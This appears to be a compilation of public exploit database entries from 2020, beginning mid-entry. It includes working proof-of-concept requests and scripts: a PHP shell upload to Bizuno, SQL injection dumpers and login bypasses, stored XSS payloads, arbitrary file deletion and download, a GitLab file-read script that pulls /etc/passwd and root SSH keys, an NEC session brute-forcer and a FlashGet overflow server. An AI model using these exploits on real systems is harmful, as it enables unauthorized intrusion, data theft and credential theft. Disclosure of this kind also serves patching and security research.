http://localhost/pblast/index.php?&p=bizuno/backup/managerRestore X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------39525038724866743160620170 Content-Length: 231 DNT: 1 Connection: close Cookie: ************************************************** -----------------------------39525038724866743160620170 Content-Disposition: form-data; name="fldFile"; filename="shell.php" Content-Type: text/php <? phpinfo(); ?> -----------------------------39525038724866743160620170-- Shell directory: ------------------------------- - http://localhost/pblast/myFiles/backups/shell.php

# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration # Author: Cold z3ro # Date: 2020-05-04 # Homepage: https://www.0x30.cc/ # Vendor Homepage: https://www.nec.com # Version: 01.03.01 # Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration <?php set_time_limit(0); $host = "192.168.0.14"; $start = 100; $end = 30000; $maxproc= 50; $execute=0; echo "\n[+] NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration\n\n"; sleep(3); for ($i = $start; $i <= $end; $i++) { $pid = @pcntl_fork(); $execute++; if ($execute >= $maxproc) { while (pcntl_waitpid(0, $status) != -1) { $status = pcntl_wexitstatus($status); $execute =0; usleep(3000); } } if (!$pid) { echo $url . " checking $i\n"; login($url, $i); flush(); exit; } } function login($url, $key) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#'); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80); curl_setopt($ch, CURLOPT_TIMEOUT, 80); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch, CURLOPT_HEADER, FALSE); $content = curl_exec($ch); curl_close ($ch); if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content)) { die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n"); } }

# Exploit Title: i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion # Date: 2020-05-02 # Author: Besim ALTINOK # Vendor Homepage: https://www.i-doit.org/ # Software Link: https://sourceforge.net/projects/i-doit/ # Version: v1.14.1 # Tested on: Xampp # Credit: İsmail BOZKURT -------------------------------------------------------------------------------------------------- Vulnerable Module ---> Import Module Vulnerable parameter ---> delete_import ----------- PoC ----------- POST /idoit/?moduleID=50&param=1&treeNode=501&mNavID=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 ****************************** Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/idoit/?moduleID=50&param=1&treeNode=501&mNavID=2 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.7.3 Content-type: application/x-www-form-urlencoded; charset=UTF-8 X-i-doit-Tenant-Id: 1 Content-Length: 30 DNT: 1 Connection: close Cookie: PHPSESSID=bf21********************************68b8 delete_import=Type the filename, you want to delete from the server here

# Exploit Title: Online Clothing Store 1.0 - Persistent Cross-Site Scripting # Date: 2020-05-05 # Exploit Author: Sushant Kamble # Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #Vulnerable Page: Offers.php #Parameter Vulnerable: Offer Detail ONLINE CLOTHING STORE 1.0 is vulnerable to Stored XSS Admin user can add malicious script to offer page. when a normal user visit a page. A script gets executed. # Exploit: Open offer.php Add below script in Offer Detail <script>alert(document.cookie)</script> Save

# Exploit Title: Booked Scheduler 2.7.7 - Authenticated Directory Traversal # Date: 2020-05-03 # Author: Besim ALTINOK # Vendor Homepage: https://www.bookedscheduler.com # Software Link: https://sourceforge.net/projects/phpscheduleit/ # Version: v2.7.7 # Tested on: Xampp # Credit: İsmail BOZKURT Description: ---------------------------------------------------------- Vulnerable Parameter: $tn Vulnerable File: manage_email_templates.php PoC ----------- GET /booked/Web/admin/manage_email_templates.php?dr=template&lang=en_us&tn=vulnerable-parameter&_=1588451710324 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 *************************** Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/booked/Web/admin/manage_email_templates.php X-Requested-With: XMLHttpRequest DNT: 1 Connection: close Cookie: new_version=v%3D2.7.7%2Cfs%3D1588451441; PHPSESSID=94129ac9414baee8c6ca2f19ab0bcbec

# Exploit Title: Online Clothing Store 1.0 - 'username' SQL Injection # Date: 2020-05-05 # Exploit Author: Sushant Kamble # Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: username # Injected Request POST /online%20Clothing%20Store/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://localhost Connection: close Referer: http://localhost/online%20Clothing%20Store/ Cookie: PHPSESSID=shu3nbnsdkb4nb73iips4jkrn7 Upgrade-Insecure-Requests: 1 txtUserName=admin'or''='&txtPassword=anything&rdType=Admin&button=Login

# Exploit Title: webTareas 2.0.p8 - Arbitrary File Deletion # Date: 2020-05-02 # Author: Besim ALTINOK # Vendor Homepage: https://sourceforge.net/projects/webtareas/files/ # Software Link: https://sourceforge.net/projects/webtareas/files/ # Version: v2.0.p8 # Tested on: Xampp # Credit: İsmail BOZKURT Description: -------------------------------------------------------------------------------------- - print_layout.php is vulnerable. When you sent PoC code to the server and If there is no file on the server, you can see, this error message <br /> <b>Warning</b>: unlink(/Applications/XAMPP/xamppfiles/htdocs/webtareas/files/PrintLayouts/tester.png.php--1.zip): No such file or directory in <b>/Applications/XAMPP/xamppfiles/htdocs/webtareas/includes/library.php</b> on line <b>1303</b><br /> - So, Here, you can delete file with unlink function. - And, I ddi try again with another file, I deleted from the server. -------------------------------------------------------------------------------------------- Arbitrary File Deletion PoC --------------------------------------------------------------------------------------- POST /webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&id=1&mode=edit&borne1=0 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 *********************** Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&mode=edit&borne1=0&id=1 Content-Type: multipart/form-data; boundary=---------------------------3678767312987982041084647942 Content-Length: 882 DNT: 1 Connection: close Cookie: webTareasSID=4b6a4799c9e7906a06c574dc48ffb730; PHPSESSIDwebERPteam=9b2b068ea2de93ed1ee0aafe27818191 Upgrade-Insecure-Requests: 1 -----------------------------3678767312987982041084647942 Content-Disposition: form-data; name="action" edit -----------------------------3678767312987982041084647942 Content-Disposition: form-data; name="desc" <p>tester</p> -----------------------------3678767312987982041084647942 Content-Disposition: form-data; name="file1"; filename="" Content-Type: application/octet-stream -----------------------------3678767312987982041084647942 Content-Disposition: form-data; name="attnam1" -----------------------------3678767312987982041084647942 Content-Disposition: form-data; name="atttmp1" --add the delete file name here-- -----------------------------3678767312987982041084647942 Content-Disposition: form-data; name="sp" -----------------------------3678767312987982041084647942--

# Exploit Title: GitLab 12.9.0 - Arbitrary File Read # Google Dork: - # Date: 2020-05-03 # Exploit Author: KouroshRZ # Vendor Homepage: https://about.gitlab.com # Software Link: https://about.gitlab.com/install # Version: tested on gitlab version 12.9.0 # Tested on: Ubuntu 18.04 (but it's OS independent) # CVE : - ##################################################################################################### # # # Copyright (c) 2020, William Bowling of Biteable, a.k.a vakzz # # All rights reserved. # # # # Redistribution and use in source and compiled forms, with or without modification, are permitted # # provided that the following conditions are met: # # # # * Redistributions of source code must retain the above copyright notice, this list of # # conditions and the following disclaimer. # # # # * Redistributions in compiled form must reproduce the above copyright notice, this list of # # conditions and the following disclaimer in the documentation and/or other materials provided # # with the distribution. # # # # * Neither the name of William Bowling nor the names of Biteable, a.k.a vakzz may be used to # # endorse or promote products derived from this software without specific prior written permission. # # # ##################################################################################################### # Exploit Title: automated exploit for Arbitrary file read via the UploadsRewriter when moving and issue in private gitlab server # Google Dork: - # Date: 05/03/2020 # Exploit Author: KouroshRZ # Vendor Homepage: https://about.gitlab.com # Software Link: https://about.gitlab.com/install # Version: tested on gitlab version 12.9.0 # Tested on: Ubuntu 18.04 (but it's OS independent) # CVE : - import requests import json from time import sleep # For debugging proxies = { 'http' : '127.0.0.1:8080', 'https' : '127.0.0.1:8080' } session = requests.Session() # config host = 'http[s]://<gitlab-address>' username = '<you-gitlab-username>' password = '<your-gitlab-password>' lastIssueUrl = "" def loginToGitLab(username, password): initLoginUrl = '{}/users/sign_in'.format(host) initLoginResult = session.get(initLoginUrl).text temp_index_csrf_param_start = initLoginResult.find("csrf-param") temp_index_csrf_param_end = initLoginResult.find("/>", temp_index_csrf_param_start) csrf_param = initLoginResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2] temp_index_csrf_token_start = initLoginResult.find("csrf-token") temp_index_csrf_token_end = initLoginResult.find("/>", temp_index_csrf_token_start) csrf_token = initLoginResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2] # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n") submitLoginUrl = '{}/users/auth/ldapmain/callback'.format(host) submitLoginData = { 'utf8=' : '✓', csrf_param : csrf_token, 'username' : username, 'password' : password, } submitLoginResult = session.post(submitLoginUrl, submitLoginData, allow_redirects=False) if submitLoginResult.status_code == 302 and submitLoginResult.text.find('redirected') > -1: print("[+] You'e logged in ...") def createNewProject(projectName): initProjectUrl = '{}/projects/new'.format(host) initProjectResult = session.get(initProjectUrl).text temp_index_csrf_param_start = initProjectResult.find("csrf-param") temp_index_csrf_param_end = initProjectResult.find("/>", temp_index_csrf_param_start) csrf_param = initProjectResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2] temp_index_csrf_token_start = initProjectResult.find("csrf-token") temp_index_csrf_token_end = initProjectResult.find("/>", temp_index_csrf_token_start) csrf_token = initProjectResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2] # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n") tmp_index_1 = initProjectResult.find('{}/{}/\n'.format(host, username)) tmp_index_2 = initProjectResult.find('value', tmp_index_1) tmp_index_3 = initProjectResult.find('type', tmp_index_2) namespace = initProjectResult[tmp_index_2 + 7 : tmp_index_3 - 2] createProjectUrl = '{}/projects'.format(host) createProjectData = { 'utf8=' : '✓', csrf_param : csrf_token, 'project[ci_cd_only]' : 'false', 'project[name]' : projectName, 'project[namespace_id]' : namespace, 'project[path]' : projectName, 'project[description]' : '', 'project[visibility_level]' : '0' } createProjectResult = session.post(createProjectUrl, createProjectData, allow_redirects=False) if createProjectResult.status_code == 302: print("[+] New Project {} created ...".format(projectName)) def createNewIssue(projectName, issueTitle, file): global lastIssueUrl initIssueUrl = '{}/{}/{}/-/issues/new'.format(host, username, projectName) initIssueResult = session.get(initIssueUrl).text temp_index_csrf_param_start = initIssueResult.find("csrf-param") temp_index_csrf_param_end = initIssueResult.find("/>", temp_index_csrf_param_start) csrf_param = initIssueResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2] temp_index_csrf_token_start = initIssueResult.find("csrf-token") temp_index_csrf_token_end = initIssueResult.find("/>", temp_index_csrf_token_start) csrf_token = initIssueResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2] # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n") createIssueUrl = '{}/{}/{}/-/issues'.format(host , username, projectName) createIssueData = { 'utf8=' : '✓', csrf_param : csrf_token, 'issue[title]' : issueTitle, 'issue[description]' : ''.format(file), 'issue[confidential]' : '0', 'issue[assignee_ids][]' : '0', 'issue[label_ids][]' : '', 'issue[due_date]' : '', 'issue[lock_version]' : '0' } createIssueResult = session.post(createIssueUrl, createIssueData, allow_redirects=False) if createIssueResult.status_code == 302: print("[+] New issue for {} created ...".format(projectName)) tmp_index_1 = createIssueResult.text.find("href") tmp_index_2 = createIssueResult.text.find("redirected") lastIssueUrl = createIssueResult.text[tmp_index_1 + 6: tmp_index_2 - 2] print("[+] url of craeted issue : {}\n".format(lastIssueUrl)) def moveLastIssue(source, destination, file): # Get destination project ID getProjectIdUrl = '{}/{}/{}'.format(host, username, destination) getProjectIdResult = session.get(getProjectIdUrl).text tmpIndex = getProjectIdResult.find('/search?project_id') projectId = getProjectIdResult[tmpIndex + 19 : tmpIndex + 21] #print("Project : {} ID ----> {}\n".format(destination, projectId)) # Get CSRF token for moving issue # initIssueMoveUrl = '{}/{}/{}/-/issues/{}'.format(host, username, source, issue) initIssueMoveUrl = lastIssueUrl initIssueMoveResult = session.get(initIssueMoveUrl).text temp_index_csrf_token_start = initIssueMoveResult.find("csrf-token") temp_index_csrf_token_end = initIssueMoveResult.find("/>", temp_index_csrf_token_start) csrf_token = initIssueMoveResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2] # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n") # Move issue with associated CSRF token # moveIssueUrl = "{}/{}/{}/-/issues/{}/move".format(host, username, source, issue) moveIssueUrl = lastIssueUrl + "/move" moveIssueData = json.dumps({ "move_to_project_id" : int(projectId) }) headers = { 'X-CSRF-Token' : csrf_token, 'X-Requested-With' : 'XMLHttpRequest', 'Content-Type' : 'application/json;charset=utf-8' } moveIssueResult = session.post(moveIssueUrl, headers = headers, data = moveIssueData, allow_redirects = False) if moveIssueResult.status_code == 500: print("[!] Permission denied for {}".format(file)) else: description = json.loads(moveIssueResult.text)["description"] tmp_index = description.find("/") fileUrl = "{}/{}/{}/{}".format(host, username, destination, description[tmp_index+1:-1]) print("[+] url of file {}: \n".format(f, fileUrl)) fileContentResult = session.get(fileUrl) if fileContentResult.status_code == 404: print("[-] No such file or directory : {}".format(f)) else: print("[+] Content of file {} read from server ...\n\n".format(f)) print(fileContentResult.text) print("\n****************************************************************************************\n") if __name__ == "__main__": loginToGitLab(username, password) createNewProject("project_01") createNewProject("project_02") # Put the files you want to read from server here # The files on server should have **4 or more permission (world readable files) files = { '/etc/passwd', '/etc/ssh/sshd_config', '/etc/ssh/ssh_config', '/root/.ssh/id_rsa', '/var/log/auth.log' # ... # ... # ... } for f in files: createNewIssue("project_01", "issue01_{}".format(f), f) moveLastIssue("project_01", "project_02",f) sleep(3)

# Exploit Title: YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection # Date: 2020-04-25 # Exploit Author: coiffeur # Vendor Homepage: https://yeswiki.net/ # Software Link: https://yeswiki.net/, https://github.com/YesWiki/yeswiki # Version: YesWiki cercopitheque < 2020-04-18-1 import sys import requests DEBUG = 0 def usage(): banner = """NAME: YesWiki cercopitheque 2020-04-18-1, SQLi SYNOPSIS: python sqli_2020.04.18.1.py <URL> [OPTIONS]... DESCRIPTION: -lt, list tables. -dt <TABLE>, dump table. AUTHOR: coiffeur """ print(banner) def parse(text): deli_l = 'ABCAABBCC|' deli_r = '|ABCAABBCC' if (text.find(deli_l) == -1) or (text.find(deli_r) == -1): print('[x] Delimiter not found, please try to switch to a Time Based SQLi') exit(-1) start = text.find(deli_l) + len(deli_l) end = start + text[start::].find(deli_r) return text[start:end] def render(elements): print(elements) def get_count(t_type, table_name=None, column_name=None): if t_type == 'table': payload = '?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(TABLE_NAME),0x7c,0x414243414142424343) FROM information_schema.tables),NULL,NULL,NULL,NULL,NULL-- -' if DEBUG > 1: print(f'[DEBUG] {payload}') r = requests.get(url=f'{sys.argv[1]}{payload}') if r.status_code == 200: data = parse(r.text) if t_type == 'column': payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(COLUMN_NAME),0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}"),NULL,NULL,NULL,NULL,NULL-- -' if DEBUG > 1: print(f'[DEBUG] {payload}') r = requests.get(url=f'{sys.argv[1]}{payload}') data = parse(r.text) if t_type == 'element': payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count({column_name}),0x7c,0x414243414142424343) FROM {table_name}),NULL,NULL,NULL,NULL,NULL-- -' if DEBUG > 1: print(f'[DEBUG] {payload}') r = requests.get(url=f'{sys.argv[1]}{payload}') data = parse(r.text) return int(data) def list_tables(): tables_count = get_count(t_type='table') print(f'[+] Tables found: {tables_count}') tables = [] for i in range(0, tables_count): payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,TABLE_NAME,0x7c,0x414243414142424343) FROM information_schema.tables LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -' if DEBUG > 1: print(f'[DEBUG] {payload}') r = requests.get(url=f'{sys.argv[1]}{payload}') if r.status_code == 200: talbe = parse(r.text) print(f'\t{talbe}') tables.append(talbe) return tables def list_columns(table_name): columns_count = get_count(t_type='column', table_name=table_name) print(f'[+] Columns found: {columns_count}') columns = [] for i in range(0, columns_count): payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,COLUMN_NAME,0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}" LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -' if DEBUG > 1: print(f'[DEBUG] {payload}') r = requests.get(url=f'{sys.argv[1]}{payload}') if r.status_code == 200: column = parse(r.text) if DEBUG > 0: print(f'\t{column}') columns.append(column) return columns def dump_table(name): columns = list_columns(name) elements = [None]*len(columns) for i in range(0, len(columns)): elements_count = get_count( t_type='element', table_name=name, column_name=columns[i]) if DEBUG > 0: print(f'[+] Dumping: {columns[i]} ({elements_count} rows)') element = [] for j in range(0, elements_count): payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,{columns[i]},0x7c,0x414243414142424343) FROM {name} LIMIT 1 OFFSET {j}),NULL,NULL,NULL,NULL,NULL-- -' if DEBUG > 1: print(f'[DEBUG] {payload}') r = requests.get(url=f'{sys.argv[1]}{payload}') if r.status_code == 200: element.append(parse(r.text)) if DEBUG > 0: print(f'\t{element[-1]}') elements[i] = element render(elements) return elements def main(): if len(sys.argv) < 3: print(usage()) exit(-1) if sys.argv[2] == '-lt': list_tables() if sys.argv[2] == '-dt': dump_table(sys.argv[3]) if __name__ == "__main__": main()

# Exploit title : MPC Sharj 3.11.1 - Arbitrary File Download # Exploit Author : SajjadBnd # Date : 2020-05-02 # Software Link : http://dl.nuller.ir/mpc-sharj-vr_3.11.1_beta[www.nuller.ir].zip # Tested on : Ubuntu 19.10 # Version : 3.11.1 Beta ############################ # # [ DESCRIPTION ] # # MPC Sharj is a free open source script for creating sim card credit card's shop. # # [POC] # # Vulnerable file: download.php # parameter : GET/ "id" # 69: readfile readfile($file); # 55: $file = urldecode(base64_decode(strrev($file))); # 53: $file = trim(strip_tags($_GET['id'])); # # payload : [ # Steps: # # 1. convert your payload (/etc/passwd) to base64 (L2V0Yy9wYXNzd2Q=) # 2. convert base64 result (L2V0Yy9wYXNzd2Q=) to strrev (=Q2dzNXYw9yY0V2L) # 3. your payload is ready ;D # http://localhost/download.php?id==Q2dzNXYw9yY0V2L # #] # import requests import os from base64 import b64encode def clear(): linux = 'clear' windows = 'cls' os.system([linux, windows][os.name == 'nt']) def banner(): print ''' ############################################################## ############################################################## #### # ######### # #### ######### ##### #### ### ###### ## #### ###### #### ############# ##### #### #### #### ### #### ###### #### ################### #### ##### ## #### #### ####### ################### #### ###### ##### #### ############ ################### #### ############### #### ############ ############# ##### #### ############### #### ##666######### ###### ############################################################## ############################################################## ###### MPC Sharj 3.11.1 Beta - Arbitrary File Download ##### ############################################################## ''' def exploit(): target = raw_input('[+] Target(http://example.com) => ') read_file = raw_input('[+] File to Read => ') read_file = b64encode(read_file) target = target+"/download.php?id"+read_file[::-1] r = requests.get(target,timeout=500) print "\n"+r.text if __name__ == '__main__': clear() banner() exploit()

# Exploit Title: FlashGet 1.9.6 - Denial of Service (PoC) # Date: 2020-05-02 # Author: Milad Karimi # Testen on: Kali Linux # Software Link: http://www.flashget.com/en/download.htm?uid=undefined # Version: 1.9.6 # CVE : N/A #!/usr/bin/python from time import sleep from socket import * res = [ '220 WELCOME!! :x\r\n', '331 Password required for %s.\r\n', '230 User %s logged in.\r\n', '250 CWD command successful.\r\n', '257 "%s/" is current directory.\r\n' # <-- %s B0f :x ] buf = 'A' * 332 s = socket(AF_INET, SOCK_STREAM) s.bind(('0.0.0.0', 21)) s.listen(1) print '[+] listening on [FTP] 21 ...\n' c, addr = s.accept() c.send(res[0]) user = '' for i in range(1, len(res)): req = c.recv(1024) print '[*][CLIENT] %s' % (req) tmp = res[i] if(req.find('USER') != -1): req = req.replace('\r\n', '') user = req.split('\x20', 1)[1] tmp %= user if(req.find('PASS') != -1): tmp %= user if(req.find('PWD') != -1): tmp %= buf print '[*][SERVER] %s' % (tmp) c.send(tmp) sleep(5) c.close() s.close() print '[+] DONE' # Discovered By : Milad Karimi

# Exploit Title: Car Park Management System 1.0 - Authentication Bypass # Date: 2020-05-07 # Exploit Author: Tarun Sehgal # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/car-park-management-system.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: phone and password #Injected Request #Below request will allow authentication bypass POST /Car%20Park%20Management%20System/proc/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 52 Origin: http://localhost Connection: close Referer: http://localhost/Car%20Park%20Management%20System/ Cookie: PHPSESSID=d84agc0pp6qihtm7u775ftvukd Upgrade-Insecure-Requests: 1 phone=' or '1'='1&password=' or '1'='1&Submit=Log+In

# Title: Draytek VigorAP 1000C - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-05-07 # Vendor: https://www.draytek.com/ # Software: https://www.draytek.com/products/vigorap-903/ # CVE: N/A Document Title: =============== Draytek VigorAP - (RADIUS) Persistent XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2244 Common Vulnerability Scoring System: ==================================== 4 Product & Service Introduction: =============================== https://www.draytek.com/ https://www.draytek.com/products/vigorap-903/ Affected Product(s): ==================== Draytek [+] VigorAP 1000C | 1.3.2 [+] VigorAP 700 | 1.11 [+] VigorAP 710 | 1.2.5 [+] VigorAP 800 | 1.1.4 [+] VigorAP 802 | 1.3.2 [+] VigorAP 810 | 1.2.5 [+] VigorAP 900 | 1.2.0 [+] VigorAP 902 | 1.2.5 [+] VigorAP 903 | 1.3.1 [+] VigorAP 910C | 1.2.5 [+] VigorAP 912C | 1.3.2 [+] VigorAP 918R Series | 1.3.2 [+] VigorAP 920R Series | 1.3.0 [+] All other VigorAP Series with Radius Module Vulnerability Disclosure Timeline: ================================== 2020-05-07: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation vulnerability has been discovered in the official Draytek VigorAP product series application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent input validation web vulnerability is located in the username input field of the RADIUS Setting - RADIUS Server Configuration module. Remote attackers with limited access are able to inject own malicious persistent script codes as username. Other privileged user accounts execute on preview of the modules context. The request method to inject is POST and the attack vector is located on the application-side. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Vulnerable Module(s): [+] RADIUS Setting - RADIUS Server Configuration - Users Profile Vulnerable Input(s): [+] Username Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information an steüs below to continue. PoC: Payload <iframe src=evil.source onload=alert(document.domain)></iframe> PoC: Vulnerable Source (http:/vigorAP.localhost:50902/home.asp) <div class="box"> <table width="652" cellspacing="1" cellpadding="2"> <tbody><tr> <th id="userName">Username</th> <th id="passwd">Password</th> <th id="confirmPasswd">Confirm Password</th> <th id="configure">Configure</th> </tr> <tr> <td><input maxlength="24" type="text" id="addusr"></td> <td><input maxlength="24" type="password" id="addpwd"></td> <td><input maxlength="24" type="password" id="addpwdcfm"></td> <td><input type="button" id="btnAddUser" value="Add" class="add" onclick="addUser()"> <input type="button" id="btnCancelUser" value="Cancel" class="add" onclick="cancelUser()"></td> </tr> </tbody></table> <table class="content" width="652" cellspacing="1" cellpadding="2"> <tbody id="usersTb"> <tr> <th id="userNo">NO.</th> <th id="userNames">Username</th> <th id="userSelect">Select</th> </tr> <tr><td>1</td><td>test</td><td><input type="checkbox"><input type="hidden" value="test"></td></tr> tr><td>2</td><td><iframe src=evil.source onload=alert(document.domain)></iframe></td><td><input type="checkbox"> <input type="hidden" value="asd"></td></tr></tbody> </table> <p><input type="button" id="btnDelSelUser" value="Delete Selected" class="del" onclick="delSelUser()"> <input type="button" id="btnDelAllUser" value="Delete All" class="del" onclick="delAllUser()"> </p></div> Reference(s): http:/vigorAP.localhost:50902/ http:/vigorAP.localhost:50902/home.asp Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: School File Management System 1.0 - 'username' SQL Injection # Date: 2020-05-04 # Exploit Author: Tarun Sehgal # Vendor Homepage: https://www.sourcecodester.com/php/14155/school-file-management-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/school-file-management-system.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: username # Injected Request POST /sfms/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 173 Origin: http://localhost Connection: close Referer: http://localhost/sfms/admin/index.php Cookie: PHPSESSID=084gi60nhgqp5lpba3q6qngk9g Upgrade-Insecure-Requests: 1 username=admin' OR 1 GROUP BY CONCAT(database(),(SELECT (CASE WHEN (7665=7665) THEN 1 ELSE 0 END)),0x3a,0x3a,version(),FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=admin&login= //Comment Above request will print database name and MariaDB version.